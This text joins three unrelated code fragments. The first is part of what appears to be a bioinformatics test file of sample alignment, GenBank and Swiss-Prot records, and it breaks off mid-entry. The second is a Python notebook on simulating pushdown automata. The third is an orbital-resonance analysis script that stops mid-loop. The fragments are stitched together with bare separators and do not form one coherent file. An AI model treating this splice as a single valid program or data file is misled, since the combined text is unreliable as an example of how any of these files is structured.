Human METVWTILPAIILVLIALPSLRILYMTDEVNDPSLTIKSIGHQWYWTYEYTDYGGLIFNS
Loach IEIVWTVLPALILILIALPSLRILYLMDEINDPHLTIKAMGHQWYWSYEYTDYENLSFDS
Mouse VETIWTILPAVILIMIALPSLRILYMMDEINNPVLTVKTMGHQWYWSYEYTDYEDLCFDS
Rat VETIWTILPAVILILIALPSLRILYMMDEINNPVLTVKTMGHQWYWSYEYTDYEDLCFDS
Seal VETVWTILPAIILILIALPSLRILYMMDEINNPSLTVKTMGHQWYWSYEYTDYEDLNFDS
Whale VETVWTILPAIILILIALPSLRILYMMDEVNNPSLTVKTMGHQWYWSYEYTDYEDLSFDS
Frog IEMVWTIMPAISLIMIALPSLRILYLMDEVNDPHLTIKAIGHQWYWSYEYTNYEDLSFDS
Cow YMIPTSELKPGELRLLEVDNRVVLPMEMTIRMLVSSEDVLHSWAVPSLGLKTDAIPGRLN
Carp YMVPTQDLAPGQFRLLETDHRMVVPMESPVRVLVSAEDVLHSWAVPSLGVKMDAVPGRLN
Chicken YMTPTTDLPLGHFRLLEVDHRIVIPMESPIRVIITADDVLHSWAVPALGVKTDAIPGRLN
Human YMLPPLFLEPGDLRLLDVDNRVVLPIEAPIRMMITSQDVLHSWAVPTLGLKTDAIPGRLN
Loach YMIPTQDLTPGQFRLLETDHRMVVPMESPIRILVSAEDVLHSWALPAMGVKMDAVPGRLN
Mouse YMIPTNDLKPGELRLLEVDNRVVLPMELPIRMLISSEDVLHSWAVPSLGLKTDAIPGRLN
Rat YMIPTNDLKPGELRLLEVDNRVVLPMELPIRMLISSEDVLHSWAIPSLGLKTDAIPGRLN
Seal YMIPTQELKPGELRLLEVDNRVVLPMEMTIRMLISSEDVLHSWAVPSLGLKTDAIPGRLN
Whale YMIPTSDLKPGELRLLEVDNRVVLPMEMTIRMLVSSEDVLHSWAVPSLGLKTDAIPGRLN
Frog YMIPTNDLTPGQFRLLEVDNRMVVPMESPTRLLVTAEDVLHSWAVPSLGVKTDAIPGRLH
Cow QTTLMSSRPGLYYGQCSEICGSNHSFMPIVLELVPLKYFEKWSASML-------
Carp QAAFIASRPGVFYGQCSEICGANHSFMPIVVEAVPLEHFENWSSLMLEDASLGS
Chicken QTSFITTRPGVFYGQCSEICGANHSYMPIVVESTPLKHFEAWSSL------LSS
Human QTTFTATRPGVYYGQCSEICGANHSFMPIVLELIPLKIFEM-------GPVFTL
Loach QTAFIASRPGVFYGQCSEICGANHSFMPIVVEAVPLSHFENWSTLMLKDASLGS
Mouse QATVTSNRPGLFYGQCSEICGSNHSFMPIVLEMVPLKYFENWSASMI-------
Rat QATVTSNRPGLFYGQCSEICGSNHSFMPIVLEMVPLKYFENWSASMI-------
Seal QTTLMTMRPGLYYGQCSEICGSNHSFMPIVLELVPLSHFEKWSTSML-------
Whale QTTLMSTRPGLFYGQCSEICGSNHSFMPIVLELVPLEVFEKWSVSML-------
Frog QTSFIATRPGVFYGQCSEICGANHSFMPIVVEAVPLTDFENWSSSML-EASL--
;
End;
"""
# This example with its slightly odd (partial) annotation is from here:
# http://www.cgb.ki.se/cgb/groups/sonnhammer/Stockholm.html
sth_example = \
"""# STOCKHOLM 1.0
#=GF ID CBS
#=GF AC PF00571
#=GF DE CBS domain
#=GF AU Bateman A
#=GF CC CBS domains are small intracellular modules mostly found
#=GF CC in 2 or four copies within a protein.
#=GF SQ 67
#=GS O31698/18-71 AC O31698
#=GS O83071/192-246 AC O83071
#=GS O83071/259-312 AC O83071
#=GS O31698/88-139 AC O31698
#=GS O31698/88-139 OS Bacillus subtilis
O83071/192-246 MTCRAQLIAVPRASSLAE..AIACAQKM....RVSRVPVYERS
#=GR O83071/192-246 SA 999887756453524252..55152525....36463774777
O83071/259-312 MQHVSAPVFVFECTRLAY..VQHKLRAH....SRAVAIVLDEY
#=GR O83071/259-312 SS CCCCCHHHHHHHHHHHHH..EEEEEEEE....EEEEEEEEEEE
O31698/18-71 MIEADKVAHVQVGNNLEH..ALLVLTKT....GYTAIPVLDPS
#=GR O31698/18-71 SS CCCHHHHHHHHHHHHHHH..EEEEEEEE....EEEEEEEEHHH
O31698/88-139 EVMLTDIPRLHINDPIMK..GFGMVINN......GFVCVENDE
#=GR O31698/88-139 SS CCCCCCCHHHHHHHHHHH..HEEEEEEE....EEEEEEEEEEH
#=GC SS_cons CCCCCHHHHHHHHHHHHH..EEEEEEEE....EEEEEEEEEEH
O31699/88-139 EVMLTDIPRLHINDPIMK..GFGMVINN......GFVCVENDE
#=GR O31699/88-139 AS ________________*__________________________
#=GR_O31699/88-139_IN ____________1______________2__________0____
//
"""
# Interlaced example from BioPerl documentation. Also note the blank line.
# http://www.bioperl.org/wiki/Stockholm_multiple_alignment_format
sth_example2 = \
"""# STOCKHOLM 1.0
#=GC SS_cons .................<<<<<<<<...<<<<<<<........>>>>>>>..
AP001509.1 UUAAUCGAGCUCAACACUCUUCGUAUAUCCUC-UCAAUAUGG-GAUGAGGGU
#=GR AP001509.1 SS -----------------<<<<<<<<---..<<-<<-------->>->>..--
AE007476.1 AAAAUUGAAUAUCGUUUUACUUGUUUAU-GUCGUGAAU-UGG-CACGA-CGU
#=GR AE007476.1 SS -----------------<<<<<<<<-----<<.<<-------->>.>>----
#=GC SS_cons ......<<<<<<<.......>>>>>>>..>>>>>>>>...............
AP001509.1 CUCUAC-AGGUA-CCGUAAA-UACCUAGCUACGAAAAGAAUGCAGUUAAUGU
#=GR AP001509.1 SS -------<<<<<--------->>>>>--->>>>>>>>---------------
AE007476.1 UUCUACAAGGUG-CCGG-AA-CACCUAACAAUAAGUAAGUCAGCAGUGAGAU
#=GR AE007476.1 SS ------.<<<<<--------->>>>>.-->>>>>>>>---------------
//"""
# Sample GenBank record from here:
# http://www.ncbi.nlm.nih.gov/Sitemap/samplerecord.html
gbk_example = \
"""LOCUS SCU49845 5028 bp DNA PLN 21-JUN-1999
DEFINITION Saccharomyces cerevisiae TCP1-beta gene, partial cds, and Axl2p
(AXL2) and Rev7p (REV7) genes, complete cds.
ACCESSION U49845
VERSION U49845.1 GI:1293613
KEYWORDS .
SOURCE Saccharomyces cerevisiae (baker's yeast)
ORGANISM Saccharomyces cerevisiae
Eukaryota; Fungi; Ascomycota; Saccharomycotina; Saccharomycetes;
Saccharomycetales; Saccharomycetaceae; Saccharomyces.
REFERENCE 1 (bases 1 to 5028)
AUTHORS Torpey,L.E., Gibbs,P.E., Nelson,J. and Lawrence,C.W.
TITLE Cloning and sequence of REV7, a gene whose function is required for
DNA damage-induced mutagenesis in Saccharomyces cerevisiae
JOURNAL Yeast 10 (11), 1503-1509 (1994)
PUBMED 7871890
REFERENCE 2 (bases 1 to 5028)
AUTHORS Roemer,T., Madden,K., Chang,J. and Snyder,M.
TITLE Selection of axial growth sites in yeast requires Axl2p, a novel
plasma membrane glycoprotein
JOURNAL Genes Dev. 10 (7), 777-793 (1996)
PUBMED 8846915
REFERENCE 3 (bases 1 to 5028)
AUTHORS Roemer,T.
TITLE Direct Submission
JOURNAL Submitted (22-FEB-1996) <NAME>, Biology, Yale University, New
Haven, CT, USA
FEATURES Location/Qualifiers
source 1..5028
/organism="Saccharomyces cerevisiae"
/db_xref="taxon:4932"
/chromosome="IX"
/map="9"
CDS <1..206
/codon_start=3
/product="TCP1-beta"
/protein_id="AAA98665.1"
/db_xref="GI:1293614"
/translation="SSIYNGISTSGLDLNNGTIADMRQLGIVESYKLKRAVVSSASEA
AEVLLRVDNIIRARPRTANRQHM"
gene 687..3158
/gene="AXL2"
CDS 687..3158
/gene="AXL2"
/note="plasma membrane glycoprotein"
/codon_start=1
/function="required for axial budding pattern of S.
cerevisiae"
/product="Axl2p"
/protein_id="AAA98666.1"
/db_xref="GI:1293615"
/translation="MTQLQISLLLTATISLLHLVVATPYEAYPIGKQYPPVARVNESF
TFQISNDTYKSSVDKTAQITYNCFDLPSWLSFDSSSRTFSGEPSSDLLSDANTTLYFN
VILEGTDSADSTSLNNTYQFVVTNRPSISLSSDFNLLALLKNYGYTNGKNALKLDPNE
VFNVTFDRSMFTNEESIVSYYGRSQLYNAPLPNWLFFDSGELKFTGTAPVINSAIAPE
TSYSFVIIATDIEGFSAVEVEFELVIGAHQLTTSIQNSLIINVTDTGNVSYDLPLNYV
YLDDDPISSDKLGSINLLDAPDWVALDNATISGSVPDELLGKNSNPANFSVSIYDTYG
DVIYFNFEVVSTTDLFAISSLPNINATRGEWFSYYFLPSQFTDYVNTNVSLEFTNSSQ
DHDWVKFQSSNLTLAGEVPKNFDKLSLGLKANQGSQSQELYFNIIGMDSKITHSNHSA
NATSTRSSHHSTSTSSYTSSTYTAKISSTSAAATSSAPAALPAANKTSSHNKKAVAIA
CGVAIPLGVILVALICFLIFWRRRRENPDDENLPHAISGPDLNNPANKPNQENATPLN
NPFDDDASSYDDTSIARRLAALNTLKLDNHSATESDISSVDEKRDSLSGMNTYNDQFQ
SQSKEELLAKPPVQPPESPFFDPQNRSSSVYMDSEPAVNKSWRYTGNLSPVSDIVRDS
YGSQKTVDTEKLFDLEAPEKEKRTSRDVTMSSLDPWNSNISPSPVRKSVTPSPYNVTK
HRNRHLQNIQDSQSGKNGITPTTMSTSSSDDFVPVKDGENFCWVHSMEPDRRPSKKRL
VDFSNKSNVNVGQVKDIHGRIPEML"
gene complement(3300..4037)
/gene="REV7"
CDS complement(3300..4037)
/gene="REV7"
/codon_start=1
/product="Rev7p"
/protein_id="AAA98667.1"
/db_xref="GI:1293616"
/translation="MNRWVEKWLRVYLKCYINLILFYRNVYPPQSFDYTTYQSFNLPQ
FVPINRHPALIDYIEELILDVLSKLTHVYRFSICIINKKNDLCIEKYVLDFSELQHVD
KDDQIITETEVFDEFRSSLNSLIMHLEKLPKVNDDTITFEAVINAIELELGHKLDRNR
RVDSLEEKAEIERDSNWVKCQEDENLPDNNGFQPPKIKLTSLVGSDVGPLIIHQFSEK
LISGDDKILNGVYSQYEEGESIFGSLF"
ORIGIN
1 gatcctccat atacaacggt atctccacct caggtttaga tctcaacaac ggaaccattg
61 ccgacatgag acagttaggt atcgtcgaga gttacaagct aaaacgagca gtagtcagct
121 ctgcatctga agccgctgaa gttctactaa gggtggataa catcatccgt gcaagaccaa
181 gaaccgccaa tagacaacat atgtaacata tttaggatat acctcgaaaa taataaaccg
241 ccacactgtc attattataa ttagaaacag aacgcaaaaa ttatccacta tataattcaa
301 agacgcgaaa aaaaaagaac aacgcgtcat agaacttttg gcaattcgcg tcacaaataa
361 attttggcaa cttatgtttc ctcttcgagc agtactcgag ccctgtctca agaatgtaat
421 aatacccatc gtaggtatgg ttaaagatag catctccaca acctcaaagc tccttgccga
481 gagtcgccct cctttgtcga gtaattttca cttttcatat gagaacttat tttcttattc
541 tttactctca catcctgtag tgattgacac tgcaacagcc accatcacta gaagaacaga
601 acaattactt aatagaaaaa ttatatcttc ctcgaaacga tttcctgctt ccaacatcta
661 cgtatatcaa gaagcattca cttaccatga cacagcttca gatttcatta ttgctgacag
721 ctactatatc actactccat ctagtagtgg ccacgcccta tgaggcatat cctatcggaa
781 aacaataccc cccagtggca agagtcaatg aatcgtttac atttcaaatt tccaatgata
841 cctataaatc gtctgtagac aagacagctc aaataacata caattgcttc gacttaccga
901 gctggctttc gtttgactct agttctagaa cgttctcagg tgaaccttct tctgacttac
961 tatctgatgc gaacaccacg ttgtatttca atgtaatact cgagggtacg gactctgccg
1021 acagcacgtc tttgaacaat acataccaat ttgttgttac aaaccgtcca tccatctcgc
1081 tatcgtcaga tttcaatcta ttggcgttgt taaaaaacta tggttatact aacggcaaaa
1141 acgctctgaa actagatcct aatgaagtct tcaacgtgac ttttgaccgt tcaatgttca
1201 ctaacgaaga atccattgtg tcgtattacg gacgttctca gttgtataat gcgccgttac
1261 ccaattggct gttcttcgat tctggcgagt tgaagtttac tgggacggca ccggtgataa
1321 actcggcgat tgctccagaa acaagctaca gttttgtcat catcgctaca gacattgaag
1381 gattttctgc cgttgaggta gaattcgaat tagtcatcgg ggctcaccag ttaactacct
1441 ctattcaaaa tagtttgata atcaacgtta ctgacacagg taacgtttca tatgacttac
1501 ctctaaacta tgtttatctc gatgacgatc ctatttcttc tgataaattg ggttctataa
1561 acttattgga tgctccagac tgggtggcat tagataatgc taccatttcc gggtctgtcc
1621 cagatgaatt actcggtaag aactccaatc ctgccaattt ttctgtgtcc atttatgata
1681 cttatggtga tgtgatttat ttcaacttcg aagttgtctc cacaacggat ttgtttgcca
1741 ttagttctct tcccaatatt aacgctacaa ggggtgaatg gttctcctac tattttttgc
1801 cttctcagtt tacagactac gtgaatacaa acgtttcatt agagtttact aattcaagcc
1861 aagaccatga ctgggtgaaa ttccaatcat ctaatttaac attagctgga gaagtgccca
1921 agaatttcga caagctttca ttaggtttga aagcgaacca aggttcacaa tctcaagagc
1981 tatattttaa catcattggc atggattcaa agataactca ctcaaaccac agtgcgaatg
2041 caacgtccac aagaagttct caccactcca cctcaacaag ttcttacaca tcttctactt
2101 acactgcaaa aatttcttct acctccgctg ctgctacttc ttctgctcca gcagcgctgc
2161 cagcagccaa taaaacttca tctcacaata aaaaagcagt agcaattgcg tgcggtgttg
2221 ctatcccatt aggcgttatc ctagtagctc tcatttgctt cctaatattc tggagacgca
2281 gaagggaaaa tccagacgat gaaaacttac cgcatgctat tagtggacct gatttgaata
2341 atcctgcaaa taaaccaaat caagaaaacg ctacaccttt gaacaacccc tttgatgatg
2401 atgcttcctc gtacgatgat acttcaatag caagaagatt ggctgctttg aacactttga
2461 aattggataa ccactctgcc actgaatctg atatttccag cgtggatgaa aagagagatt
2521 ctctatcagg tatgaataca tacaatgatc agttccaatc ccaaagtaaa gaagaattat
2581 tagcaaaacc cccagtacag cctccagaga gcccgttctt tgacccacag aataggtctt
2641 cttctgtgta tatggatagt gaaccagcag taaataaatc ctggcgatat actggcaacc
2701 tgtcaccagt ctctgatatt gtcagagaca gttacggatc acaaaaaact gttgatacag
2761 aaaaactttt cgatttagaa gcaccagaga aggaaaaacg tacgtcaagg gatgtcacta
2821 tgtcttcact ggacccttgg aacagcaata ttagcccttc tcccgtaaga aaatcagtaa
2881 caccatcacc atataacgta acgaagcatc gtaaccgcca cttacaaaat attcaagact
2941 ctcaaagcgg taaaaacgga atcactccca caacaatgtc aacttcatct tctgacgatt
3001 ttgttccggt taaagatggt gaaaattttt gctgggtcca tagcatggaa ccagacagaa
3061 gaccaagtaa gaaaaggtta gtagattttt caaataagag taatgtcaat gttggtcaag
3121 ttaaggacat tcacggacgc atcccagaaa tgctgtgatt atacgcaacg atattttgct
3181 taattttatt ttcctgtttt attttttatt agtggtttac agatacccta tattttattt
3241 agtttttata cttagagaca tttaatttta attccattct tcaaatttca tttttgcact
3301 taaaacaaag atccaaaaat gctctcgccc tcttcatatt gagaatacac tccattcaaa
3361 attttgtcgt caccgctgat taatttttca ctaaactgat gaataatcaa aggccccacg
3421 tcagaaccga ctaaagaagt gagttttatt ttaggaggtt gaaaaccatt attgtctggt
3481 aaattttcat cttcttgaca tttaacccag tttgaatccc tttcaatttc tgctttttcc
3541 tccaaactat cgaccctcct gtttctgtcc aacttatgtc ctagttccaa ttcgatcgca
3601 ttaataactg cttcaaatgt tattgtgtca tcgttgactt taggtaattt ctccaaatgc
3661 ataatcaaac tatttaagga agatcggaat tcgtcgaaca cttcagtttc cgtaatgatc
3721 tgatcgtctt tatccacatg ttgtaattca ctaaaatcta aaacgtattt ttcaatgcat
3781 aaatcgttct ttttattaat aatgcagatg gaaaatctgt aaacgtgcgt taatttagaa
3841 agaacatcca gtataagttc ttctatatag tcaattaaag caggatgcct attaatggga
3901 acgaactgcg gcaagttgaa tgactggtaa gtagtgtagt cgaatgactg aggtgggtat
3961 acatttctat aaaataaaat caaattaatg tagcatttta agtataccct cagccacttc
4021 tctacccatc tattcataaa gctgacgcaa cgattactat tttttttttc ttcttggatc
4081 tcagtcgtcg caaaaacgta taccttcttt ttccgacctt ttttttagct ttctggaaaa
4141 gtttatatta gttaaacagg gtctagtctt agtgtgaaag ctagtggttt cgattgactg
4201 atattaagaa agtggaaatt aaattagtag tgtagacgta tatgcatatg tatttctcgc
4261 ctgtttatgt ttctacgtac ttttgattta tagcaagggg aaaagaaata catactattt
4321 tttggtaaag gtgaaagcat aatgtaaaag ctagaataaa atggacgaaa taaagagagg
4381 cttagttcat cttttttcca aaaagcaccc aatgataata actaaaatga aaaggatttg
4441 ccatctgtca gcaacatcag ttgtgtgagc aataataaaa tcatcacctc cgttgccttt
4501 agcgcgtttg tcgtttgtat cttccgtaat tttagtctta tcaatgggaa tcataaattt
4561 tccaatgaat tagcaatttc gtccaattct ttttgagctt cttcatattt gctttggaat
4621 tcttcgcact tcttttccca ttcatctctt tcttcttcca aagcaacgat ccttctaccc
4681 atttgctcag agttcaaatc ggcctctttc agtttatcca ttgcttcctt cagtttggct
4741 tcactgtctt ctagctgttg ttctagatcc tggtttttct tggtgtagtt ctcattatta
4801 gatctcaagt tattggagtc ttcagccaat tgctttgtat cagacaattg actctctaac
4861 ttctccactt cactgtcgag ttgctcgttt ttagcggaca aagatttaat ctcgttttct
4921 ttttcagtgt tagattgctc taattctttg agctgttctc tcagctcctc atatttttct
4981 tgccatgact cagattctaa ttttaagcta ttcaatttct ctttgatc
//"""
# GenBank format protein (aka GenPept) file from:
# http://www.molecularevolution.org/resources/fileformats/
gbk_example2 = \
"""LOCUS AAD51968 143 aa linear BCT 21-AUG-2001
DEFINITION transcriptional regulator RovA [Yersinia enterocolitica].
ACCESSION AAD51968
VERSION AAD51968.1 GI:5805369
DBSOURCE locus AF171097 accession AF171097.1
KEYWORDS .
SOURCE Yersinia enterocolitica
ORGANISM Yersinia enterocolitica
Bacteria; Proteobacteria; Gammaproteobacteria; Enterobacteriales;
Enterobacteriaceae; Yersinia.
REFERENCE 1 (residues 1 to 143)
AUTHORS Revell,P.A. and Miller,V.L.
TITLE A chromosomally encoded regulator is required for expression of the
Yersinia enterocolitica inv gene and for virulence
JOURNAL Mol. Microbiol. 35 (3), 677-685 (2000)
MEDLINE 20138369
PUBMED 10672189
REFERENCE 2 (residues 1 to 143)
AUTHORS Revell,P.A. and Miller,V.L.
TITLE Direct Submission
JOURNAL Submitted (22-JUL-1999) Molecular Microbiology, Washington
University School of Medicine, Campus Box 8230, 660 South Euclid,
St. Louis, MO 63110, USA
COMMENT Method: conceptual translation.
FEATURES Location/Qualifiers
source 1..143
/organism="Yersinia enterocolitica"
/mol_type="unassigned DNA"
/strain="JB580v"
/serotype="O:8"
/db_xref="taxon:630"
Protein 1..143
/product="transcriptional regulator RovA"
/name="regulates inv expression"
CDS 1..143
/gene="rovA"
/coded_by="AF171097.1:380..811"
/note="regulator of virulence"
/transl_table=11
ORIGIN
1 mestlgsdla rlvrvwrali dhrlkplelt qthwvtlhni nrlppeqsqi qlakaigieq
61 pslvrtldql eekglitrht candrrakri klteqsspii eqvdgvicst rkeilggisp
121 deiellsgli dklerniiql qsk
//"""
swiss_example = \
"""ID 104K_THEAN Reviewed; 893 AA.
AC Q4U9M9;
DT 18-APR-2006, integrated into UniProtKB/Swiss-Prot.
DT 05-JUL-2005, sequence version 1.
DT 31-OCT-2006, entry version 8.
DE 104 kDa microneme-rhoptry antigen precursor (p104).
GN ORFNames=TA08425;
OS Theileria annulata.
OC Eukaryota; Alveolata; Apicomplexa; Piroplasmida; Theileriidae;
OC Theileria.
OX NCBI_TaxID=5874;
RN [1]
RP NUCLEOTIDE SEQUENCE [LARGE SCALE GENOMIC DNA].
RC STRAIN=Ankara;
RX PubMed=15994557; DOI=10.1126/science.1110418;
RA | |
# coding: utf-8
# In[1]:
from jove.SystemImports import *
from jove.TransitionSelectors import *
from jove.DotBashers import chk_consistent_pda
# # Pushdown Automata (PDA)
#
# ## Basic Definitions
#
# Pushdown Automata are structures
#
# $(Q, Sigma, Gamma, Delta, q0, z0, F)$
#
# where
#
# * $Q$ : Finite non-empty set of states
#
# * $Sigma$ : Finite non-empty input alphabet
#
# * $Gamma$ : Finite non-empty stack alphabet (usually subsumes Sigma)
#
# * $Delta$ : A transition function
#
# and $Delta$'s signature is
#
# $(Q \times (Sigma \cup \{\varepsilon\}) \times (Gamma\cup\{\varepsilon\}) \rightarrow (Q \times Gamma^*)$
#
# ## Example
#
# We model Delta as a mapping of this form
#
# (q, a, b) -> { (q1,G1s), (q2,G2s), ... }
#
# where
# a gets read
# b gets popped, if non-empty
# Gis gets pushed
# qi becomes the next state
#
# * q0 : Starting state
#
# * z0 : Initial stack's lone contents
#
# - prevents an "accept by
# empty stack" PDA from accepting as soon as it is
# switched on
#
# * F : Finite, possibly empty set of final states
#
# We will define acceptance by final state _or_ empty stack, as will be detailed in this sequel.
#
# ## Instantaneous Description
#
# An instantaneous description (ID) of a PDA is a triple (p, aI, bS).
#
# Now, ID (p, aI, bS) evolves to an ID (q, I, GS)
#
# written
#
# (p, aI, bS) $\vdash$ (q, I, GS)
#
#
# if Delta(p,a,b) contains (q,G)
#
# A PDA accepts by final state if its ID is of the form (p, "", S)
# where p in F.
#
# That is, the input is fully consumed
# and control resides within F. Note that S is arbitrary.
#
# A PDA accepts by empty stack if its ID is of the form (p, "", "")
# at any point (for any p).
#
# ## Design Details of a PDA
#
# To __prevent__ a PDA P whose acceptance is defined via an empty stack
# from accepting "as soon as it is turned on", we put in an
# initial stack letter denoted by P["z0"].
#
# * As of now, P["z0"] is the hash mark, #
#
# - It does not matter what this character it is
#
# - With markdowns, the initial stack contents is always #
#
# * Note that this is only to help-out the user. The user may decide to start with
# an empty stack, which is fine.
#
# * Our preferred initial stack symbol is "z" (lower-case z).
#
#
# # Our coding decisions wrt acceptance
#
# In our coding,
#
# * For PDA, we will require there to be an initial stack symbol
#
# * We will permit acceptance either by final state or empty stack (this will be a
# parameter given to the run_pda function)
#
# * We will require that a PDA always pop something from the stack (but allow zero or more things to be pushed). This way ("zero or more"), emptying the stack becomes possible.
#
# * When we encounter an ID for which acceptance has been noted, that ID will still be expanded if there are moves leading out of it.
#
# # Routines to run PDA
#
# We now devise a routine to run a PDA according to either the "accept by final state" criterion or "accept by empty stack" criterion. We call these "ACCEPT_F" and "ACCEPT_S" with the default being ACCEPT_F. The main difference is that the "final" configurations are collected differently.
# In[2]:
def explore_pda(inp, P, acceptance = 'ACCEPT_F', STKMAX=0, chatty=False):
"""A handy routine to print the result of run_pda plus making
future extensions to explore run-results.
"""
chk_consistent_pda(P)
(term, final, visited) = run_pda(inp, P, acceptance, STKMAX=STKMAX,
chatty=chatty)
if (final == []):
print("String " + inp + " rejected by your PDA :-(")
print("Visited states are:")
print(visited)
else:
print("String " + inp + " accepted by your PDA in " +
str(len(final)) + " ways :-) ")
print("Here are the ways: ")
for fin_path in final:
(fin, path) = fin_path
print("Final state ", fin)
print("Reached as follows:")
for p in path:
print("-> ", p)
print("-> ", fin, ".")
# In[3]:
def run_pda(str, P, acceptance = 'ACCEPT_F', STKMAX=0, chatty=False):
"""Helper for explore_pda
---
Input: An initial string str.
A PDA P
The acceptance criterion (default is "by final state"
encoded as ACCEPT_F. The alternative is ACCEPT_S
that stands for "acceptance by empty stack").
Output: (l_term_id_path, l_final_id_path, s_visited_id)
Thus, an external routine can probe and determine
* terminal IDs
* acceptance configurations
* visited IDs
"""
chk_consistent_pda(P)
init_id = (P["q0"], str, P["z0"]) # Initial ID
init_l_id_path = [(init_id, [])] # [(Initial ID, empty path)]
s_visited_id = set({}) # Nothing visited yet
(l_surv,
l_term,
l_final) = classify_l_id_path(init_l_id_path, s_visited_id, P, acceptance,
STKMAX=STKMAX)
rslt = h_run_pda(l_id_path = l_surv,
l_term_id_path = l_term,
l_final_id_path = l_final,
s_visited_id = s_visited_id,
pda = P,
acceptance = acceptance, # Acceptance criterion
STKMAX = STKMAX
)
(terminal_id_path, final_id_path, visited_ids) = rslt
if chatty:
print("terminal_id_path = ", terminal_id_path)
print("final_id_path = ", final_id_path)
print("visited_ids = ", visited_ids)
return rslt
# In[4]:
def classify_l_id_path(l_id_path, s_visited_id, P, acceptance, STKMAX):
"""Helper for run_pda
---
Given a list l_id_path of id_path pairs, a list s_visited_id
of visited IDs, a PDA P, and the acceptance criterion, classify
the contents of id_path into survivors, terminals, and finals.
"""
#print("---")
#print("classify_l_id_path >> ")
#print("l_id_path = ", l_id_path)
#print("s_visited_id = ", s_visited_id)
surv_pool = list(map(survivor_id(s_visited_id, P, STKMAX=STKMAX), l_id_path))
term_pool = list(map(term_id(s_visited_id, P, STKMAX=STKMAX), l_id_path))
final_pool = list(map(final_id(P, acceptance), l_id_path))
l_surv = list(map(lambda x: x[1],
filter(lambda x: x[0]=="surv",
surv_pool)))
l_term = list(map(lambda x: x[1],
filter(lambda x: x[0]=="term",
term_pool)))
l_final = list(map(lambda x: x[1],
filter(lambda x: x[0]=="final",
final_pool)))
#print("classify_l_id_path << ")
#print("l_surv = ", l_surv)
#print("l_term = ", l_term)
#print("l_final = ", l_final)
#print("---")
return (l_surv, l_term, l_final)
# In[5]:
def h_run_pda(l_id_path, l_term_id_path, l_final_id_path, s_visited_id,
pda, acceptance, STKMAX):
"""Helper for run_pda
---
Input: A list of id_path, all of which are surviving i.e. not
"term" or terminal. This invariant is maintained.
A list of terminal id_path (terminal in that there is
no point pushing on them; stuck or loopy).
A list of final id_path: whenever we meet the
acceptance condition, we record that configuration;
A list of visited id. This will help determine if
terminal or not. Detects looping as well.
A PDA.
Output: (l_term_id_path, l_final_id_path, s_visited_id)
Thus, an external routine can probe and determine
* terminal IDs
* acceptance configurations
* visited IDs
"""
while (l_id_path != []):
id_path0 = l_id_path[0]
(id0,path0) = id_path0 # separate out the id and path
# First, record the current id0 in s_visited_id
s_visited_id = {id0} | s_visited_id
# Then obtain (ID, path) pairs generated by
# taking all possible one-step moves out of id0.
# We also record the extension of path0 in each such
# reached new ID.
nl_id_path0 = step_pda(id0, path0, pda)
if nl_id_path0 == []:
# Nothing gen by firing id0; recurse on rest
l_id_path = l_id_path[1:]
else:
# Classify the progenies of id0 in nl_id_path0
(l_surv,
l_term,
l_final) = classify_l_id_path(nl_id_path0, s_visited_id, pda, acceptance, STKMAX)
l_id_path = l_id_path[1:] + l_surv
l_term_id_path = l_term_id_path + l_term
l_final_id_path = l_final_id_path + l_final
return (l_term_id_path, l_final_id_path, s_visited_id)
# In[6]:
def interpret_w_eps(q_inp_stk, pda):
"""Helper for step_pda
---
Produce the most liberal interpretation of q_inp_stk for pda
i.e. in (q, inp_str, stk_str), we can ignore inp_str or stk_str.
E.g. if inp_str is "ab", we can consider it to be "" or "a".
The rest of the string will then be "ab" or "b" respectively.
This is done if a move in Delta can process that option.
"""
(q, inp_str, stk_str) = q_inp_stk
inp_interps = cvt_str_to_sym(inp_str) # Diverse interpretations of input
stk_interps | |
__author__ = "<NAME>"
__copyright__ = "Copyright 2020"
__version__ = "1.0.1"
__maintainer__ = "Rabaa"
__email__ = "<EMAIL>"
import numpy as np
import sys
## Class: TestParticle
# Functions: Default Constructor, DataDissection, IdentifyResonance, PrintData
class TestParticle:
def __init__(self): # Attributes defined
self.Resonant = False
self.ResonanceType = 'n:n'
self.Name = 'N/A'
self.ResonanceCenter = -999
self.ResonanceAmplitude = -999
self.AverageSMA = -999 # Average SemiMajor axist
self.AverageEccentricity = -999
self.AverageInclination = -999
self.Kozai = False
self.SMAamplitude = -999
self.SMACenter = -999
self.Index = -1
############################################ FUNCTIONS #################################################
############################################ DATA DISSECTION #################################################
# Expects: typeOfData, IndexCount
# Will do: Alter the Resonance & Kozai attributes of the class, given the write orbital elements
def DataDissection(self, typeOfData, IndexCount):
self.Index = IndexCount
TestParticleSample = sys.argv[1] # User to choose a test sample using terminal
with open('tp' + TestParticleSample + ".out") as f: # Counting number of lines
for line, l in enumerate(f):
pass
NumberOfLines = line
# Taking the test point's data from the .out file sequentially
TestParticleTime, Index, SemiMajorAxis, Eccentricity, Inclination, Omega, omega, AngularPosition, LongitudeTP = np.genfromtxt(
'tp' + TestParticleSample + ".out", unpack=True)
Longitude = np.genfromtxt(
"LN.out", usecols= 8, unpack=True)
NumberOfLines = (NumberOfLines / (max(Index)+1)) -1 # Dividing the total number of lines by number of test particles, to get steps of one test particle.
# Matching the orbitals with the index we need
TestParticleTime = TestParticleTime[Index == IndexCount]
SemiMajorAxis = SemiMajorAxis[Index == IndexCount]
Eccentricity = Eccentricity[Index == IndexCount]
Inclination = Inclination[Index == IndexCount]
Omega = Omega[Index == IndexCount]
omega = omega[Index == IndexCount]
AngularPosition = AngularPosition[Index == IndexCount]
# Calculating Lambda, Pomega
Lambda = (Omega + omega + AngularPosition) % 360 # The Lambda for test particles
Pomega = (Omega + omega) % 360 # The longitude if pericenter in degrees
# Flags "Specific ones"
IsItResonant = False # Is it in resonance?
ResonanceAmplitude = -999 # The Resonance Amplitude
ResonanceCenter = -999 # The Resonance Center
ResonanceName = -999 # The Resonance name "Ration"
IsItKozai = False # Is it Kozai resonance?
SMAAmplitude = -999 # SemiMajor amplitude
SMACenter = -999 # SemiMajor center
# Flags "General ones"
IsIt = False # Resonance / Kozai ?
Amplitude = -999 # Phi / SMA
Center = -999 # Phi / SMA
Name = -999 # Name of the test particle
# General flags will be used in the coming loop, Specific flags will then be set at the end, to distinguish Kozai / Resonance
# list of resonances to check: pp and qq for pp:qq resonance
pp = [2, 3, 3, 4, 4, 5, 5, 5, 5, 6, 7, 7, 7, 7, 8, 8, 9, 9, 9, 10]
qq = [1, 1, 2, 1, 3, 1, 2, 3, 4, 1, 1, 2, 3, 4, 1, 3, 1, 2, 4, 1]
for jj in np.arange(0, len(pp)): # First Loop
ResSemiMajorAxis = 30.1 * (float(pp[jj]) / float(qq[jj])) ** (
2. / 3.) # Kepler's Third Law to calculate semimajor axis of the resonance
